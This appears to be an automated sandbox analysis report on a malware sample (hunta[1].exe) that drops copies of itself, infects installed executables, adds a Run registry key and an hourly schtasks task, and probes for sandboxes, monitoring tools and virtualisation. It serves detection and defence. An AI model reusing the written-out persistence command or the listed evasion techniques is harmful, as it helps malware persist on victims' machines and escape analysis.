Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: hunta[1].exe Static file information: File size 2383872 > 1048576
Source: hunta[1].exe Static PE information: Raw size of gpsaqaiu is bigger than: 0x100000 < 0x1ad600
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\hunta[1].exe Unpacked PE file: 2.2.hunta[1].exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Unpacked PE file: 4.2.WwKLWFk.exe.210000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 14.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 15.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 21.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Unpacked PE file: 22.2.WwKLWFk.exe.b50000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 24.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: u
PE file contains sections with non-standard names
Source: hunta[1].exe Static PE information: section name:
Source: hunta[1].exe Static PE information: section name: .idata
Source: hunta[1].exe Static PE information: section name:
Source: hunta[1].exe Static PE information: section name: gpsaqaiu
Source: hunta[1].exe Static PE information: section name: zlufpcnd
Source: hunta[1].exe Static PE information: section name: .taggant
Source: hunta[1].exe Static PE information: section name: u
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name: .idata
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name: gpsaqaiu
Source: RageMP131.exe.2.dr Static PE information: section name: zlufpcnd
Source: RageMP131.exe.2.dr Static PE information: section name: .taggant
Source: RageMP131.exe.2.dr Static PE information: section name: u
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name: .idata
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name: gpsaqaiu
Source: MPGPH131.exe.2.dr Static PE information: section name: zlufpcnd
Source: MPGPH131.exe.2.dr Static PE information: section name: .taggant
Source: MPGPH131.exe.2.dr Static PE information: section name: u
Source: WwKLWFk.exe.2.dr Static PE information: section name: .aspack
Source: WwKLWFk.exe.2.dr Static PE information: section name: .adata
Source: MyProg.exe.4.dr Static PE information: section name: PELIB
Source: MyProg.exe.4.dr Static PE information: section name: Y|uR
Source: SciTE.exe.4.dr Static PE information: section name: u
Source: Uninstall.exe.4.dr Static PE information: section name: EpNuZ
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F5D157 push ecx; ret 2_2_00F5D16A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00211638 push dword ptr [00213084h]; ret 4_2_0021170E
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_0021600A push ebp; ret 4_2_0021600D
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00216014 push 002114E1h; ret 4_2_00216425
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00212D9B push ecx; ret 4_2_00212DAB
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003DD157 push ecx; ret 14_2_003DD16A
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003DD157 push ecx; ret 15_2_003DD16A
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0034D157 push ecx; ret 21_2_0034D16A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B51638 push dword ptr [00B53084h]; ret 22_2_00B5170E
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B56014 push 00B514E1h; ret 22_2_00B56425
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B52D9B push ecx; ret 22_2_00B52DAB
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B5600A push ebp; ret 22_2_00B5600D
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0034D157 push ecx; ret 24_2_0034D16A
Source: hunta[1].exe Static PE information: section name: entropy: 7.9863529700778955
Source: hunta[1].exe Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: hunta[1].exe Static PE information: section name: u entropy: 6.9350665765420185
Source: RageMP131.exe.2.dr Static PE information: section name: entropy: 7.9863529700778955
Source: RageMP131.exe.2.dr Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: RageMP131.exe.2.dr Static PE information: section name: u entropy: 6.9350665765420185
Source: MPGPH131.exe.2.dr Static PE information: section name: entropy: 7.9863529700778955
Source: MPGPH131.exe.2.dr Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: MPGPH131.exe.2.dr Static PE information: section name: u entropy: 6.9350665765420185
Source: WwKLWFk.exe.2.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: MyProg.exe.4.dr Static PE information: section name: Y|uR entropy: 6.933467573803484
Source: SciTE.exe.4.dr Static PE information: section name: u entropy: 6.934542386941867
Source: Uninstall.exe.4.dr Static PE information: section name: EpNuZ entropy: 6.934080518099734

Persistence and Installation Behavior
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\hunta[1].exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\hunta[1].exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\hunta[1].exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113B018 second address: 113B024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11444A7 second address: 11444AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1144604 second address: 114460E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1144796 second address: 114479C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114479C second address: 11447A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11447A0 second address: 11447B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF2E5514DE6h 0x0000000d jnl 00007FF2E5514DE6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114860C second address: 114862F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FF2E55A2C26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E55A2C34h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114862F second address: 1148647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148647 second address: 114864B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114864B second address: 114866F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007FF2E5514DECh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007FF2E5514DE6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114866F second address: 1148675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148675 second address: 114869D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11486F9 second address: 1148703 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148703 second address: 114871F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114871F second address: 1148723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
